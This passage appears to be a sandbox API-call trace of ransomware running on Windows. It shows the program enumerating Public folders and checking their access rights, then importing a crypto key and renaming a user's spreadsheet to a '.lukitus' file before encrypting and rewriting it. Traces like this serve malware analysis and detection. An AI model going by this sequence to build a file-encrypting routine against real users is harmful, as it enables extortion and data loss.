[0106.392] GetCurrentProcess () returned 0xffffffff [0106.392] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.392] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.392] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.392] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.392] CloseHandle (hObject=0x344) returned 1 [0106.392] CloseHandle (hObject=0x33c) returned 1 [0106.392] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.392] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.392] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.392] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.397] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Music\\Sample Music", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.397] GetLastError () returned 0x7a [0106.397] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Music\\Sample Music", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xc4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281b560) returned 1 [0106.397] GetLastError () returned 0x7a [0106.397] GetCurrentThread () returned 0xfffffffe [0106.397] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.397] GetCurrentProcess () returned 0xffffffff [0106.397] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.397] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.398] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.398] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.398] CloseHandle (hObject=0x32c) returned 1 [0106.398] CloseHandle (hObject=0x344) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.398] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.398] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.398] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.398] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Pictures\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.399] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.399] GetLastError () returned 0x7a [0106.399] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x28b26f0, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28b26f0, lpnLengthNeeded=0x281baf8) returned 1 [0106.399] GetLastError () returned 0x7a [0106.399] GetCurrentThread () returned 0xfffffffe [0106.399] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.399] GetCurrentProcess () returned 0xffffffff [0106.399] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.399] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.399] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.399] AccessCheck (in: pSecurityDescriptor=0x28b26f0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.399] CloseHandle (hObject=0x344) returned 1 [0106.399] CloseHandle (hObject=0x33c) returned 1 [0106.399] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.399] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.399] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.399] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.400] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.400] GetLastError () returned 0x7a [0106.400] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x28b26f0, nLength=0xc4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28b26f0, lpnLengthNeeded=0x281b560) returned 1 [0106.400] GetLastError () returned 0x7a [0106.400] GetCurrentThread () returned 0xfffffffe [0106.400] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.400] GetCurrentProcess () returned 0xffffffff [0106.400] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.401] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.401] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.401] AccessCheck (in: pSecurityDescriptor=0x28b26f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.401] CloseHandle (hObject=0x32c) returned 1 [0106.401] CloseHandle (hObject=0x344) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.401] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.401] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.402] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.402] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Recorded TV", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.402] GetLastError () returned 0x7a [0106.402] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Recorded TV", RequestedInformation=0x7, pSecurityDescriptor=0x28b26f0, nLength=0x114, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28b26f0, lpnLengthNeeded=0x281baf8) returned 1 [0106.402] GetLastError () returned 0x7a [0106.402] GetCurrentThread () returned 0xfffffffe [0106.402] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.402] GetCurrentProcess () returned 0xffffffff [0106.402] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.402] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.402] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.402] AccessCheck (in: pSecurityDescriptor=0x28b26f0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.402] CloseHandle (hObject=0x344) returned 1 [0106.402] CloseHandle (hObject=0x33c) returned 1 [0106.402] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.402] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.402] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.402] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.402] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Recorded TV\\Sample Media", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.403] GetLastError () returned 0x7a [0106.403] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Recorded TV\\Sample Media", RequestedInformation=0x7, pSecurityDescriptor=0x28b26f0, nLength=0x114, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28b26f0, lpnLengthNeeded=0x281b560) returned 1 [0106.403] GetLastError () returned 0x7a [0106.403] GetCurrentThread () returned 0xfffffffe [0106.403] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.403] GetCurrentProcess () returned 0xffffffff [0106.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.403] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.403] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.403] AccessCheck (in: pSecurityDescriptor=0x28b26f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.403] CloseHandle (hObject=0x32c) returned 1 [0106.403] CloseHandle (hObject=0x344) returned 1 [0106.403] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.403] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.403] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.403] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.403] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.403] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.403] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.403] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.403] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Videos\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.403] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Videos", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.403] GetLastError () returned 0x7a [0106.403] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Videos", RequestedInformation=0x7, pSecurityDescriptor=0x28b26f0, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28b26f0, lpnLengthNeeded=0x281baf8) returned 1 [0106.403] GetLastError () returned 0x7a [0106.404] GetCurrentThread () returned 0xfffffffe [0106.404] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.404] GetCurrentProcess () returned 0xffffffff [0106.404] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.404] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.404] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.404] AccessCheck (in: pSecurityDescriptor=0x28b26f0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.404] CloseHandle (hObject=0x344) returned 1 [0106.404] CloseHandle (hObject=0x33c) returned 1 [0106.404] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.404] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.404] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.404] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.404] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Videos\\Sample Videos", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.404] GetLastError () returned 0x7a [0106.404] GetFileSecurityW (in: lpFileName="c:\\Users\\Public\\Videos\\Sample Videos", RequestedInformation=0x7, pSecurityDescriptor=0x28b26f0, nLength=0xc4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28b26f0, lpnLengthNeeded=0x281b560) returned 1 [0106.404] GetLastError () returned 0x7a [0106.404] GetCurrentThread () returned 0xfffffffe [0106.404] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.404] GetCurrentProcess () returned 0xffffffff [0106.404] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.404] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.404] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.404] AccessCheck (in: pSecurityDescriptor=0x28b26f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.404] CloseHandle (hObject=0x32c) returned 1 [0106.405] CloseHandle (hObject=0x344) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.405] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.405] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.405] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 0 [0106.405] FindClose (in: hFindFile=0x5fc298 | out: hFindFile=0x5fc298) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0106.405] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 0 [0106.405] FindClose (in: hFindFile=0x5fc258 | out: hFindFile=0x5fc258) returned 1 [0106.406] CryptAcquireContextA (in: phProv=0x281fca4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x281fca4*=0x606b98) returned 1 [0106.406] CryptImportKey (in: hProv=0x606b98, pbData=0x571498, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x281fe64 | out: phKey=0x281fe64*=0x5fc258) returned 1 [0106.406] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\1C8jivFwqY_v.xls" (normalized: "c:\\users\\aetadzjz\\documents\\1c8jivfwqy_v.xls"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd08ab0, ftCreationTime.dwHighDateTime=0x1d305fd, ftLastAccessTime.dwLowDateTime=0xeb7d4680, ftLastAccessTime.dwHighDateTime=0x1d2fa4c, ftLastWriteTime.dwLowDateTime=0xeb7d4680, ftLastWriteTime.dwHighDateTime=0x1d2fa4c, nFileSizeHigh=0x0, nFileSizeLow=0x143ff)) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.407] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\1C8jivFwqY_v.xls" (normalized: "c:\\users\\aetadzjz\\documents\\1c8jivfwqy_v.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.407] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\1C8jivFwqY_v.xls" (normalized: "c:\\users\\aetadzjz\\documents\\1c8jivfwqy_v.xls"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-B1DC6762-4F6CBAB10E0B.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-b1dc6762-4f6cbab10e0b.lukitus"), dwFlags=0x9) returned 1 [0106.409] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.409] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.415] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x143ff, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x143ff, lpOverlapped=0x0) returned 1 [0106.416] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.416] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x143ff, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x143ff, lpOverlapped=0x0) returned 1 [0106.416] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 